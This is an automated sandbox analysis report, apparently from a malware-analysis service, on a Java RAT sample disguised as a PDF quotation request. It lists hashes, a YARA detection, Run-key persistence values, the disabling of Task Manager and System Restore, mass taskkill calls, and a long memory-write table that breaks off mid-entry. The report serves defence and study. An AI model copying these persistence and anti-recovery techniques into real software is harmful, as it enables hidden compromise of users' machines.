Analysis
-
max time kernel
149s -
max time network
144s -
platform
windows7_x64 -
resource
win7 -
submitted
18-08-2020 19:21
Static task
static1
Behavioral task
behavioral1
Sample
TECHNO GROUP REQUEST FOR QUOTATION RFQ_pdf.jar
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
TECHNO GROUP REQUEST FOR QUOTATION RFQ_pdf.jar
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
TECHNO GROUP REQUEST FOR QUOTATION RFQ_pdf.jar
-
Size
411KB
-
MD5
f29f8a490d27bb40bfc0bc597afb8afb
-
SHA1
34c8a7efcbffebada0711cbf8a31822f4de0ca9c
-
SHA256
bec1e9a4fe86006e3e32848e8b2a8db1c9e6505fe4b6a37d4d9a25e9e0a7cb8c
-
SHA512
9010f364fdcf603e68e5b97a4429f480903ed5978d7e61a383f6246cbac6e07d9bc584634481478a1e4eca60869e663e62b95d34d9875ef6e977f8ba119bb72d
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
resource yara_rule behavioral1/files/0x000300000001353a-7.dat qarallax_dll -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
pid Process 616 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\"" java.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\ujTBR\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\ujTBR\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\ujTBR\Desktop.ini java.exe File created C:\Users\Admin\ujTBR\Desktop.ini java.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\iBoOZ java.exe File opened for modification C:\Windows\System32\iBoOZ java.exe -
Kills process with taskkill 19 IoCs
pid Process 1964 taskkill.exe 1912 taskkill.exe 1828 taskkill.exe 1072 taskkill.exe 1136 taskkill.exe 1952 taskkill.exe 1992 taskkill.exe 1520 taskkill.exe 1544 taskkill.exe 1328 taskkill.exe 1916 taskkill.exe 1868 taskkill.exe 1632 taskkill.exe 1916 taskkill.exe 1940 taskkill.exe 1080 taskkill.exe 320 taskkill.exe 1644 taskkill.exe 1040 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1648 powershell.exe 1648 powershell.exe -
Suspicious use of AdjustPrivilegeToken 100 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1072 WMIC.exe Token: SeSecurityPrivilege 1072 WMIC.exe Token: SeTakeOwnershipPrivilege 1072 WMIC.exe Token: SeLoadDriverPrivilege 1072 WMIC.exe Token: SeSystemProfilePrivilege 1072 WMIC.exe Token: SeSystemtimePrivilege 1072 WMIC.exe Token: SeProfSingleProcessPrivilege 1072 WMIC.exe Token: SeIncBasePriorityPrivilege 1072 WMIC.exe Token: SeCreatePagefilePrivilege 1072 WMIC.exe Token: SeBackupPrivilege 1072 WMIC.exe Token: SeRestorePrivilege 1072 WMIC.exe Token: SeShutdownPrivilege 1072 WMIC.exe Token: SeDebugPrivilege 1072 WMIC.exe Token: SeSystemEnvironmentPrivilege 1072 WMIC.exe Token: SeRemoteShutdownPrivilege 1072 WMIC.exe Token: SeUndockPrivilege 1072 WMIC.exe Token: SeManageVolumePrivilege 1072 WMIC.exe Token: 33 1072 WMIC.exe Token: 34 1072 WMIC.exe Token: 35 1072 WMIC.exe Token: SeIncreaseQuotaPrivilege 1072 WMIC.exe Token: SeSecurityPrivilege 1072 WMIC.exe Token: SeTakeOwnershipPrivilege 1072 WMIC.exe Token: SeLoadDriverPrivilege 1072 WMIC.exe Token: SeSystemProfilePrivilege 1072 WMIC.exe Token: SeSystemtimePrivilege 1072 WMIC.exe Token: SeProfSingleProcessPrivilege 1072 WMIC.exe Token: SeIncBasePriorityPrivilege 1072 WMIC.exe Token: SeCreatePagefilePrivilege 1072 WMIC.exe Token: SeBackupPrivilege 1072 WMIC.exe Token: SeRestorePrivilege 1072 WMIC.exe Token: SeShutdownPrivilege 1072 WMIC.exe Token: SeDebugPrivilege 1072 WMIC.exe Token: SeSystemEnvironmentPrivilege 1072 WMIC.exe Token: SeRemoteShutdownPrivilege 1072 WMIC.exe Token: SeUndockPrivilege 1072 WMIC.exe Token: SeManageVolumePrivilege 1072 WMIC.exe Token: 33 1072 WMIC.exe Token: 34 1072 WMIC.exe Token: 35 1072 WMIC.exe Token: SeIncreaseQuotaPrivilege 1496 WMIC.exe Token: SeSecurityPrivilege 1496 WMIC.exe Token: SeTakeOwnershipPrivilege 1496 WMIC.exe Token: SeLoadDriverPrivilege 1496 WMIC.exe Token: SeSystemProfilePrivilege 1496 WMIC.exe Token: SeSystemtimePrivilege 1496 WMIC.exe Token: SeProfSingleProcessPrivilege 1496 WMIC.exe Token: SeIncBasePriorityPrivilege 1496 WMIC.exe Token: SeCreatePagefilePrivilege 1496 WMIC.exe Token: SeBackupPrivilege 1496 WMIC.exe Token: SeRestorePrivilege 1496 WMIC.exe Token: SeShutdownPrivilege 1496 WMIC.exe Token: SeDebugPrivilege 1496 WMIC.exe Token: SeSystemEnvironmentPrivilege 1496 WMIC.exe Token: SeRemoteShutdownPrivilege 1496 WMIC.exe Token: SeUndockPrivilege 1496 WMIC.exe Token: SeManageVolumePrivilege 1496 WMIC.exe Token: 33 1496 WMIC.exe Token: 34 1496 WMIC.exe Token: 35 1496 WMIC.exe Token: SeIncreaseQuotaPrivilege 1496 WMIC.exe Token: SeSecurityPrivilege 1496 WMIC.exe Token: SeTakeOwnershipPrivilege 1496 WMIC.exe Token: SeLoadDriverPrivilege 1496 WMIC.exe Token: SeSystemProfilePrivilege 1496 WMIC.exe Token: SeSystemtimePrivilege 1496 WMIC.exe Token: SeProfSingleProcessPrivilege 1496 WMIC.exe Token: SeIncBasePriorityPrivilege 1496 WMIC.exe Token: SeCreatePagefilePrivilege 1496 WMIC.exe Token: SeBackupPrivilege 1496 WMIC.exe Token: SeRestorePrivilege 1496 WMIC.exe Token: SeShutdownPrivilege 1496 WMIC.exe Token: SeDebugPrivilege 1496 WMIC.exe Token: SeSystemEnvironmentPrivilege 1496 WMIC.exe Token: SeRemoteShutdownPrivilege 1496 WMIC.exe Token: SeUndockPrivilege 1496 WMIC.exe Token: SeManageVolumePrivilege 1496 WMIC.exe Token: 33 1496 WMIC.exe Token: 34 1496 WMIC.exe Token: 35 1496 WMIC.exe Token: SeDebugPrivilege 1544 taskkill.exe Token: SeDebugPrivilege 1072 taskkill.exe Token: SeDebugPrivilege 1328 taskkill.exe Token: SeDebugPrivilege 1868 taskkill.exe Token: SeDebugPrivilege 1648 powershell.exe Token: SeDebugPrivilege 320 taskkill.exe Token: SeDebugPrivilege 1916 taskkill.exe Token: SeDebugPrivilege 1632 taskkill.exe Token: SeDebugPrivilege 1136 taskkill.exe Token: SeDebugPrivilege 1644 taskkill.exe Token: SeDebugPrivilege 1992 taskkill.exe Token: SeDebugPrivilege 1040 taskkill.exe Token: SeDebugPrivilege 1940 taskkill.exe Token: SeDebugPrivilege 1952 taskkill.exe Token: SeDebugPrivilege 1080 taskkill.exe Token: SeDebugPrivilege 1916 taskkill.exe Token: SeDebugPrivilege 1964 taskkill.exe Token: SeDebugPrivilege 1912 taskkill.exe Token: SeDebugPrivilege 1520 taskkill.exe Token: SeDebugPrivilege 1828 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 616 java.exe -
Suspicious use of WriteProcessMemory 798 IoCs
description pid Process procid_target PID 616 wrote to memory of 288 616 java.exe 25 PID 616 wrote to memory of 288 616 java.exe 25 PID 616 wrote to memory of 288 616 java.exe 25 PID 616 wrote to memory of 680 616 java.exe 26 PID 616 wrote to memory of 680 616 java.exe 26 PID 616 wrote to memory of 680 616 java.exe 26 PID 680 wrote to memory of 1072 680 cmd.exe 27 PID 680 wrote to memory of 1072 680 cmd.exe 27 PID 680 wrote to memory of 1072 680 cmd.exe 27 PID 616 wrote to memory of 1524 616 java.exe 28 PID 616 wrote to memory of 1524 616 java.exe 28 PID 616 wrote to memory of 1524 616 java.exe 28 PID 1524 wrote to memory of 1496 1524 cmd.exe 29 PID 1524 wrote to memory of 1496 1524 cmd.exe 29 PID 1524 wrote to memory of 1496 1524 cmd.exe 29 PID 616 wrote to memory of 1824 616 java.exe 30 PID 616 wrote to memory of 1824 616 java.exe 30 PID 616 wrote to memory of 1824 616 java.exe 30 PID 616 wrote to memory of 1840 616 java.exe 31 PID 616 wrote to memory of 1840 616 java.exe 31 PID 616 wrote to memory of 1840 616 java.exe 31 PID 616 wrote to memory of 1852 616 java.exe 32 PID 616 wrote to memory of 1852 616 java.exe 32 PID 616 wrote to memory of 1852 616 java.exe 32 PID 616 wrote to memory of 1188 616 java.exe 33 PID 616 wrote to memory of 1188 616 java.exe 33 PID 616 wrote to memory of 1188 616 java.exe 33 PID 616 wrote to memory of 1784 616 java.exe 34 PID 616 wrote to memory of 1784 616 java.exe 34 PID 616 wrote to memory of 1784 616 java.exe 34 PID 616 wrote to memory of 1780 616 java.exe 35 PID 616 wrote to memory of 1780 616 java.exe 35 PID 616 wrote to memory of 1780 616 java.exe 35 PID 616 wrote to memory of 1764 616 java.exe 36 PID 616 wrote to memory of 1764 616 java.exe 36 PID 616 wrote to memory of 1764 616 java.exe 36 PID 616 wrote to memory of 1744 616 java.exe 37 PID 616 wrote to memory of 1744 616 java.exe 37 PID 616 wrote to memory of 1744 616 java.exe 37 PID 616 wrote to memory of 1628 616 java.exe 38 PID 616 wrote to memory of 1628 616 java.exe 38 PID 616 wrote to memory of 1628 616 java.exe 38 PID 616 wrote to memory of 1648 616 java.exe 39 PID 616 wrote to memory of 1648 616 java.exe 39 PID 616 wrote to memory of 1648 616 java.exe 39 PID 616 wrote to memory of 1544 616 java.exe 40 PID 616 wrote to memory of 1544 616 java.exe 40 PID 616 wrote to memory of 1544 616 java.exe 40 PID 616 wrote to memory of 1908 616 java.exe 42 PID 616 wrote to memory of 1908 616 java.exe 42 PID 616 wrote to memory of 1908 616 java.exe 42 PID 616 wrote to memory of 1932 616 java.exe 43 PID 616 wrote to memory of 1932 616 java.exe 43 PID 616 wrote to memory of 1932 616 java.exe 43 PID 616 wrote to memory of 1948 616 java.exe 44 PID 616 wrote to memory of 1948 616 java.exe 44 PID 616 wrote to memory of 1948 616 java.exe 44 PID 616 wrote to memory of 1980 616 java.exe 45 PID 616 wrote to memory of 1980 616 java.exe 45 PID 616 wrote to memory of 1980 616 java.exe 45 PID 616 wrote to memory of 1168 616 java.exe 50 PID 616 wrote to memory of 1168 616 java.exe 50 PID 616 wrote to memory of 1168 616 java.exe 50 PID 616 wrote to memory of 1032 616 java.exe 51 PID 616 wrote to memory of 1032 616 java.exe 51 PID 616 wrote to memory of 1032 616 java.exe 51 PID 1628 wrote to memory of 1472 1628 cmd.exe 53 PID 1628 wrote to memory of 1472 1628 cmd.exe 53 PID 1628 wrote to memory of 1472 1628 cmd.exe 53 PID 616 wrote to memory of 1424 616 java.exe 55 PID 616 wrote to memory of 1424 616 java.exe 55 PID 616 wrote to memory of 1424 616 java.exe 55 PID 616 wrote to memory of 472 616 java.exe 57 PID 616 wrote to memory of 472 616 java.exe 57 PID 616 wrote to memory of 472 616 java.exe 57 PID 1628 wrote to memory of 328 1628 cmd.exe 58 PID 1628 wrote to memory of 328 1628 cmd.exe 58 PID 1628 wrote to memory of 328 1628 cmd.exe 58 PID 616 wrote to memory of 744 616 java.exe 61 PID 616 wrote to memory of 744 616 java.exe 61 PID 616 wrote to memory of 744 616 java.exe 61 PID 616 wrote to memory of 1532 616 java.exe 62 PID 616 wrote to memory of 1532 616 java.exe 62 PID 616 wrote to memory of 1532 616 java.exe 62 PID 616 wrote to memory of 1804 616 java.exe 64 PID 616 wrote to memory of 1804 616 java.exe 64 PID 616 wrote to memory of 1804 616 java.exe 64 PID 616 wrote to memory of 792 616 java.exe 66 PID 616 wrote to memory of 792 616 java.exe 66 PID 616 wrote to memory of 792 616 java.exe 66 PID 616 wrote to memory of 1816 616 java.exe 67 PID 616 wrote to memory of 1816 616 java.exe 67 PID 616 wrote to memory of 1816 616 java.exe 67 PID 616 wrote to memory of 1832 616 java.exe 68 PID 616 wrote to memory of 1832 616 java.exe 68 PID 616 wrote to memory of 1832 616 java.exe 68 PID 616 wrote to memory of 1740 616 java.exe 71 PID 616 wrote to memory of 1740 616 java.exe 71 PID 616 wrote to memory of 1740 616 java.exe 71 PID 616 wrote to memory of 1548 616 java.exe 73 PID 616 wrote to memory of 1548 616 java.exe 73 PID 616 wrote to memory of 1548 616 java.exe 73 PID 792 wrote to memory of 1912 792 cmd.exe 74 PID 792 wrote to memory of 1912 792 cmd.exe 74 PID 792 wrote to memory of 1912 792 cmd.exe 74 PID 616 wrote to memory of 1900 616 java.exe 75 PID 616 wrote to memory of 1900 616 java.exe 75 PID 616 wrote to memory of 1900 616 java.exe 75 PID 616 wrote to memory of 368 616 java.exe 79 PID 616 wrote to memory of 368 616 java.exe 79 PID 616 wrote to memory of 368 616 java.exe 79 PID 792 wrote to memory of 1256 792 cmd.exe 80 PID 792 wrote to memory of 1256 792 cmd.exe 80 PID 792 wrote to memory of 1256 792 cmd.exe 80 PID 616 wrote to memory of 1072 616 java.exe 81 PID 616 wrote to memory of 1072 616 java.exe 81 PID 616 wrote to memory of 1072 616 java.exe 81 PID 616 wrote to memory of 1692 616 java.exe 83 PID 616 wrote to memory of 1692 616 java.exe 83 PID 616 wrote to memory of 1692 616 java.exe 83 PID 616 wrote to memory of 1080 616 java.exe 85 PID 616 wrote to memory of 1080 616 java.exe 85 PID 616 wrote to memory of 1080 616 java.exe 85 PID 616 wrote to memory of 1788 616 java.exe 88 PID 616 wrote to memory of 1788 616 java.exe 88 PID 616 wrote to memory of 1788 616 java.exe 88 PID 616 wrote to memory of 1612 616 java.exe 89 PID 616 wrote to memory of 1612 616 java.exe 89 PID 616 wrote to memory of 1612 616 java.exe 89 PID 616 wrote to memory of 1056 616 java.exe 91 PID 616 wrote to memory of 1056 616 java.exe 91 PID 616 wrote to memory of 1056 616 java.exe 91 PID 616 wrote to memory of 1516 616 java.exe 92 PID 616 wrote to memory of 1516 616 java.exe 92 PID 616 wrote to memory of 1516 616 java.exe 92 PID 616 wrote to memory of 580 616 java.exe 95 PID 616 wrote to memory of 580 616 java.exe 95 PID 616 wrote to memory of 580 616 java.exe 95 PID 616 wrote to memory of 288 616 java.exe 98 PID 616 wrote to memory of 288 616 java.exe 98 PID 616 wrote to memory of 288 616 java.exe 98 PID 616 wrote to memory of 680 616 java.exe 99 PID 616 wrote to memory of 680 616 java.exe 99 PID 616 wrote to memory of 680 616 java.exe 99 PID 616 wrote to memory of 1908 616 java.exe 100 PID 616 wrote to memory of 1908 616 java.exe 100 PID 616 wrote to memory of 1908 616 java.exe 100 PID 616 wrote to memory of 1804 616 java.exe 104 PID 616 wrote to memory of 1804 616 java.exe 104 PID 616 wrote to memory of 1804 616 java.exe 104 PID 1908 wrote to memory of 1408 1908 cmd.exe 105 PID 1908 wrote to memory of 1408 1908 cmd.exe 105 PID 1908 wrote to memory of 1408 1908 cmd.exe 105 PID 616 wrote to memory of 1328 616 java.exe 107 PID 616 wrote to memory of 1328 616 java.exe 107 PID 616 wrote to memory of 1328 616 java.exe 107 PID 616 wrote to memory of 1828 616 java.exe 108 PID 616 wrote to memory of 1828 616 java.exe 108 PID 616 wrote to memory of 1828 616 java.exe 108 PID 1908 wrote to memory of 1548 1908 cmd.exe 110 PID 1908 wrote to memory of 1548 1908 cmd.exe 110 PID 1908 wrote to memory of 1548 1908 cmd.exe 110 PID 616 wrote to memory of 320 616 java.exe 111 PID 616 wrote to memory of 320 616 java.exe 111 PID 616 wrote to memory of 320 616 java.exe 111 PID 616 wrote to memory of 1576 616 java.exe 114 PID 616 wrote to memory of 1576 616 java.exe 114 PID 616 wrote to memory of 1576 616 java.exe 114 PID 616 wrote to memory of 1916 616 java.exe 115 PID 616 wrote to memory of 1916 616 java.exe 115 PID 616 wrote to memory of 1916 616 java.exe 115 PID 616 wrote to memory of 1836 616 java.exe 117 PID 616 wrote to memory of 1836 616 java.exe 117 PID 616 wrote to memory of 1836 616 java.exe 117 PID 1576 wrote to memory of 1900 1576 cmd.exe 118 PID 1576 wrote to memory of 1900 1576 cmd.exe 118 PID 1576 wrote to memory of 1900 1576 cmd.exe 118 PID 616 wrote to memory of 1628 616 java.exe 120 PID 616 wrote to memory of 1628 616 java.exe 120 PID 616 wrote to memory of 1628 616 java.exe 120 PID 1576 wrote to memory of 1992 1576 cmd.exe 122 PID 1576 wrote to memory of 1992 1576 cmd.exe 122 PID 1576 wrote to memory of 1992 1576 cmd.exe 122 PID 616 wrote to memory of 1860 616 java.exe 123 PID 616 wrote to memory of 1860 616 java.exe 123 PID 616 wrote to memory of 1860 616 java.exe 123 PID 1860 wrote to memory of 2044 1860 cmd.exe 124 PID 1860 wrote to memory of 2044 1860 cmd.exe 124 PID 1860 wrote to memory of 2044 1860 cmd.exe 124 PID 616 wrote to memory of 1868 616 java.exe 125 PID 616 wrote to memory of 1868 616 java.exe 125 PID 616 wrote to memory of 1868 616 java.exe 125 PID 1860 wrote to memory of 1892 1860 cmd.exe 127 PID 1860 wrote to memory of 1892 1860 cmd.exe 127 PID 1860 wrote to memory of 1892 1860 cmd.exe 127 PID 616 wrote to memory of 1824 616 java.exe 128 PID 616 wrote to memory of 1824 616 java.exe 128 PID 616 wrote to memory of 1824 616 java.exe 128 PID 1824 wrote to memory of 1212 1824 cmd.exe 129 PID 1824 wrote to memory of 1212 1824 cmd.exe 129 PID 1824 wrote to memory of 1212 1824 cmd.exe 129 PID 1824 wrote to memory of 1896 1824 cmd.exe 130 PID 1824 wrote to memory of 1896 1824 cmd.exe 130 PID 1824 wrote to memory of 1896 1824 cmd.exe 130 PID 616 wrote to memory of 1356 616 java.exe 131 PID 616 wrote to memory of 1356 616 java.exe 131 PID 616 wrote to memory of 1356 616 java.exe 131 PID 1356 wrote to memory of 1988 1356 cmd.exe 132 PID 1356 wrote to memory of 1988 1356 cmd.exe 132 PID 1356 wrote to memory of 1988 1356 cmd.exe 132 PID 1356 wrote to memory of 1560 1356 cmd.exe 133 PID 1356 wrote to memory of 1560 1356 cmd.exe 133 PID 1356 wrote to memory of 1560 1356 cmd.exe 133 PID 616 wrote to memory of 1520 616 java.exe 134 PID 616 wrote to memory of 1520 616 java.exe 134 PID 616 wrote to memory of 1520 616 java.exe 134 PID 1520 wrote to memory of 1796 1520 cmd.exe 135 PID 1520 wrote to memory of 1796 1520 cmd.exe 135 PID 1520 wrote to memory of 1796 1520 cmd.exe 135 PID 1520 wrote to memory of 1580 1520 cmd.exe 136 PID 1520 wrote to memory of 1580 1520 cmd.exe 136 PID 1520 wrote to memory of 1580 1520 cmd.exe 136 PID 616 wrote to memory of 1340 616 java.exe 137 PID 616 wrote to memory of 1340 616 java.exe 137 PID 616 wrote to memory of 1340 616 java.exe 137 PID 1340 wrote to memory of 1524 1340 cmd.exe 138 PID 1340 wrote to memory of 1524 1340 cmd.exe 138 PID 1340 wrote to memory of 1524 1340 cmd.exe 138 PID 1340 wrote to memory of 1916 1340 cmd.exe 139 PID 1340 wrote to memory of 1916 1340 cmd.exe 139 PID 1340 wrote to memory of 1916 1340 cmd.exe 139 PID 616 wrote to memory of 320 616 java.exe 140 PID 616 wrote to memory of 320 616 java.exe 140 PID 616 wrote to memory of 320 616 java.exe 140 PID 616 wrote to memory of 1344 616 java.exe 141 PID 616 wrote to memory of 1344 616 java.exe 141 PID 616 wrote to memory of 1344 616 java.exe 141 PID 1344 wrote to memory of 1068 1344 cmd.exe 143 PID 1344 wrote to memory of 1068 1344 cmd.exe 143 PID 1344 wrote to memory of 1068 1344 cmd.exe 143 PID 1344 wrote to memory of 1836 1344 cmd.exe 144 PID 1344 wrote to memory of 1836 1344 cmd.exe 144 PID 1344 wrote to memory of 1836 1344 cmd.exe 144 PID 616 wrote to memory of 1932 616 java.exe 145 PID 616 wrote to memory of 1932 616 java.exe 145 PID 616 wrote to memory of 1932 616 java.exe 145 PID 1932 wrote to memory of 1892 1932 cmd.exe 146 PID 1932 wrote to memory of 1892 1932 cmd.exe 146 PID 1932 wrote to memory of 1892 1932 cmd.exe 146 PID 1932 wrote to memory of 1624 1932 cmd.exe 147 PID 1932 wrote to memory of 1624 1932 cmd.exe 147 PID 1932 wrote to memory of 1624 1932 cmd.exe 147 PID 616 wrote to memory of 1884 616 java.exe 148 PID 616 wrote to memory of 1884 616 java.exe 148 PID 616 wrote to memory of 1884 616 java.exe 148 PID 1884 wrote to memory of 1468 1884 cmd.exe 149 PID 1884 wrote to memory of 1468 1884 cmd.exe 149 PID 1884 wrote to memory of 1468 1884 cmd.exe 149 PID 1884 wrote to memory of 688 1884 cmd.exe 150 PID 1884 wrote to memory of 688 1884 cmd.exe 150 PID 1884 wrote to memory of 688 1884 cmd.exe 150 PID 616 wrote to memory of 2036 616 java.exe 151 PID 616 wrote to memory of 2036 616 java.exe 151 PID 616 wrote to memory of 2036 616 java.exe 151 PID 2036 wrote to memory of 1560 2036 cmd.exe 152 PID 2036 wrote to memory of 1560 2036 cmd.exe 152 PID 2036 wrote to memory of 1560 2036 cmd.exe 152 PID 2036 wrote to memory of 1592 2036 cmd.exe 153 PID 2036 wrote to memory of 1592 2036 cmd.exe 153 PID 2036 wrote to memory of 1592 2036 cmd.exe 153 PID 616 wrote to memory of 1804 616 java.exe 154 PID 616 wrote to memory of 1804 616 java.exe 154 PID 616 wrote to memory of 1804 616 java.exe 154 PID 1804 wrote to memory of 1808 1804 cmd.exe 155 PID 1804 wrote to memory of 1808 1804 cmd.exe 155 PID 1804 wrote to memory of 1808 1804 cmd.exe 155 PID 1804 wrote to memory of 1524 1804 cmd.exe 156 PID 1804 wrote to memory of 1524 1804 cmd.exe 156 PID 1804 wrote to memory of 1524 1804 cmd.exe 156 PID 616 wrote to memory of 1916 616 java.exe 157 PID 616 wrote to memory of 1916 616 java.exe 157 PID 616 wrote to memory of 1916 616 java.exe 157 PID 616 wrote to memory of 1040 616 java.exe 159 PID 616 wrote to memory of 1040 616 java.exe 159 PID 616 wrote to memory of 1040 616 java.exe 159 PID 1040 wrote to memory of 1544 1040 cmd.exe 160 PID 1040 wrote to memory of 1544 1040 cmd.exe 160 PID 1040 wrote to memory of 1544 1040 cmd.exe 160 PID 1040 wrote to memory of 580 1040 cmd.exe 161 PID 1040 wrote to memory of 580 1040 cmd.exe 161 PID 1040 wrote to memory of 580 1040 cmd.exe 161 PID 616 wrote to memory of 1400 616 java.exe 162 PID 616 wrote to memory of 1400 616 java.exe 162 PID 616 wrote to memory of 1400 616 java.exe 162 PID 1400 wrote to memory of 660 1400 cmd.exe 163 PID 1400 wrote to memory of 660 1400 cmd.exe 163 PID 1400 wrote to memory of 660 1400 cmd.exe 163 PID 1400 wrote to memory of 828 1400 cmd.exe 164 PID 1400 wrote to memory of 828 1400 cmd.exe 164 PID 1400 wrote to memory of 828 1400 cmd.exe 164 PID 616 wrote to memory of 1868 616 java.exe 165 PID 616 wrote to memory of 1868 616 java.exe 165 PID 616 wrote to memory of 1868 616 java.exe 165 PID 1868 wrote to memory of 1820 1868 cmd.exe 166 PID 1868 wrote to memory of 1820 1868 cmd.exe 166 PID 1868 wrote to memory of 1820 1868 cmd.exe 166 PID 1868 wrote to memory of 1168 1868 cmd.exe 167 PID 1868 wrote to memory of 1168 1868 cmd.exe 167 PID 1868 wrote to memory of 1168 1868 cmd.exe 167 PID 616 wrote to memory of 1636 616 java.exe 168 PID 616 wrote to memory of 1636 616 java.exe 168 PID 616 wrote to memory of 1636 616 java.exe 168 PID 1636 wrote to memory of 328 1636 cmd.exe 169 PID 1636 wrote to memory of 328 1636 cmd.exe 169 PID 1636 wrote to memory of 328 1636 cmd.exe 169 PID 1636 wrote to memory of 648 1636 cmd.exe 170 PID 1636 wrote to memory of 648 1636 cmd.exe 170 PID 1636 wrote to memory of 648 1636 cmd.exe 170 PID 616 wrote to memory of 1836 616 java.exe 171 PID 616 wrote to memory of 1836 616 java.exe 171 PID 616 wrote to memory of 1836 616 java.exe 171 PID 1836 wrote to memory of 1340 1836 cmd.exe 172 PID 1836 wrote to memory of 1340 1836 cmd.exe 172 PID 1836 wrote to memory of 1340 1836 cmd.exe 172 PID 616 wrote to memory of 1632 616 java.exe 173 PID 616 wrote to memory of 1632 616 java.exe 173 PID 616 wrote to memory of 1632 616 java.exe 173 PID 1836 wrote to memory of 1956 1836 cmd.exe 175 PID 1836 wrote to memory of 1956 1836 cmd.exe 175 PID 1836 wrote to memory of 1956 1836 cmd.exe 175 PID 616 wrote to memory of 1936 616 java.exe 176 PID 616 wrote to memory of 1936 616 java.exe 176 PID 616 wrote to memory of 1936 616 java.exe 176 PID 1936 wrote to memory of 240 1936 cmd.exe 177 PID 1936 wrote to memory of 240 1936 cmd.exe 177 PID 1936 wrote to memory of 240 1936 cmd.exe 177 PID 1936 wrote to memory of 1840 1936 cmd.exe 178 PID 1936 wrote to memory of 1840 1936 cmd.exe 178 PID 1936 wrote to memory of 1840 1936 cmd.exe 178 PID 616 wrote to memory of 1992 616 java.exe 179 PID 616 wrote to memory of 1992 616 java.exe 179 PID 616 wrote to memory of 1992 616 java.exe 179 PID 1992 wrote to memory of 1424 1992 cmd.exe 180 PID 1992 wrote to memory of 1424 1992 cmd.exe 180 PID 1992 wrote to memory of 1424 1992 cmd.exe 180 PID 1992 wrote to memory of 1184 1992 cmd.exe 181 PID 1992 wrote to memory of 1184 1992 cmd.exe 181 PID 1992 wrote to memory of 1184 1992 cmd.exe 181 PID 616 wrote to memory of 1064 616 java.exe 182 PID 616 wrote to memory of 1064 616 java.exe 182 PID 616 wrote to memory of 1064 616 java.exe 182 PID 1064 wrote to memory of 1592 1064 cmd.exe 183 PID 1064 wrote to memory of 1592 1064 cmd.exe 183 PID 1064 wrote to memory of 1592 1064 cmd.exe 183 PID 1064 wrote to memory of 1952 1064 cmd.exe 184 PID 1064 wrote to memory of 1952 1064 cmd.exe 184 PID 1064 wrote to memory of 1952 1064 cmd.exe 184 PID 616 wrote to memory of 1488 616 java.exe 185 PID 616 wrote to memory of 1488 616 java.exe 185 PID 616 wrote to memory of 1488 616 java.exe 185 PID 1488 wrote to memory of 1056 1488 cmd.exe 186 PID 1488 wrote to memory of 1056 1488 cmd.exe 186 PID 1488 wrote to memory of 1056 1488 cmd.exe 186 PID 1488 wrote to memory of 660 1488 cmd.exe 187 PID 1488 wrote to memory of 660 1488 cmd.exe 187 PID 1488 wrote to memory of 660 1488 cmd.exe 187 PID 616 wrote to memory of 1472 616 java.exe 188 PID 616 wrote to memory of 1472 616 java.exe 188 PID 616 wrote to memory of 1472 616 java.exe 188 PID 1472 wrote to memory of 1168 1472 cmd.exe 189 PID 1472 wrote to memory of 1168 1472 cmd.exe 189 PID 1472 wrote to memory of 1168 1472 cmd.exe 189 PID 1472 wrote to memory of 1980 1472 cmd.exe 190 PID 1472 wrote to memory of 1980 1472 cmd.exe 190 PID 1472 wrote to memory of 1980 1472 cmd.exe 190 PID 616 wrote to memory of 1136 616 java.exe 191 PID 616 wrote to memory of 1136 616 java.exe 191 PID 616 wrote to memory of 1136 616 java.exe 191 PID 616 wrote to memory of 1260 616 java.exe 193 PID 616 wrote to memory of 1260 616 java.exe 193 PID 616 wrote to memory of 1260 616 java.exe 193 PID 1260 wrote to memory of 1788 1260 cmd.exe 194 PID 1260 wrote to memory of 1788 1260 cmd.exe 194 PID 1260 wrote to memory of 1788 1260 cmd.exe 194 PID 1260 wrote to memory of 1520 1260 cmd.exe 195 PID 1260 wrote to memory of 1520 1260 cmd.exe 195 PID 1260 wrote to memory of 1520 1260 cmd.exe 195 PID 616 wrote to memory of 1672 616 java.exe 196 PID 616 wrote to memory of 1672 616 java.exe 196 PID 616 wrote to memory of 1672 616 java.exe 196 PID 1672 wrote to memory of 2044 1672 cmd.exe 197 PID 1672 wrote to memory of 2044 1672 cmd.exe 197 PID 1672 wrote to memory of 2044 1672 cmd.exe 197 PID 1672 wrote to memory of 1840 1672 cmd.exe 198 PID 1672 wrote to memory of 1840 1672 cmd.exe 198 PID 1672 wrote to memory of 1840 1672 cmd.exe 198 PID 616 wrote to memory of 1624 616 java.exe 199 PID 616 wrote to memory of 1624 616 java.exe 199 PID 616 wrote to memory of 1624 616 java.exe 199 PID 1624 wrote to memory of 688 1624 cmd.exe 200 PID 1624 wrote to memory of 688 1624 cmd.exe 200 PID 1624 wrote to memory of 688 1624 cmd.exe 200 PID 1624 wrote to memory of 1532 1624 cmd.exe 201 PID 1624 wrote to memory of 1532 1624 cmd.exe 201 PID 1624 wrote to memory of 1532 1624 cmd.exe 201 PID 616 wrote to memory of 1852 616 java.exe 202 PID 616 wrote to memory of 1852 616 